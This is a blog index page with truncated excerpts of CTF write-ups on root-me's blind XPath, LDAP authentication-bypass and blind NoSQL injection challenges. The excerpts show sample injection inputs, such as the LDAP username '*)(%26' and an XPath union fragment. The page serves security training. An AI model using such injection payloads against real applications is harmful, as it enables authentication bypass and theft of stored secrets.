Protected: MeepwnCTF2018 – Map lờ

There is no excerpt because this is a protected post.

Advertisements

[root-me] XPath injection – blind

Statement You’ve to retrieve the administrator password. http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=1' => XPath error: //user[userid=1\']  : single quotes and many special characters were escaped it means I can't use a string with quotes directly to find password value so I will use substring compare to substring, but we have to find password length first. http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=111111 ] | //user[1][userid=1 and … Continue reading [root-me] XPath injection – blind

[root-me] LDAP injection – authentication

Statement Bypass authentication mechanism. input: username=*)&password=111 ERROR : Invalid LDAP syntax : (&(uid=*))(userPassword=111)) (we know query structure) input: username=*)(%26&password=111 which will become (&(uid=*)(&)(userPassword=111)) but the output is : unknown identifiers ... which means my input has no error but i need to add more things ... Please read 4.2.1 section from their document !!! (|(type=Rsc1)(type=Rsc2)) If the … Continue reading [root-me] LDAP injection – authentication

[root-me]NoSQL injection – blind

Statement This is a little web application to test challenge flags. Retrieve the flag for the challenge ’nosqlblind’. I wasted my time for this challenge ... because of "#" character ... I don't think It is the comment character in mongodb until... please read this document, It will help you alot https://docs.mongodb.com/manual/reference/operator/query/regex/ yeah, regex is … Continue reading [root-me]NoSQL injection – blind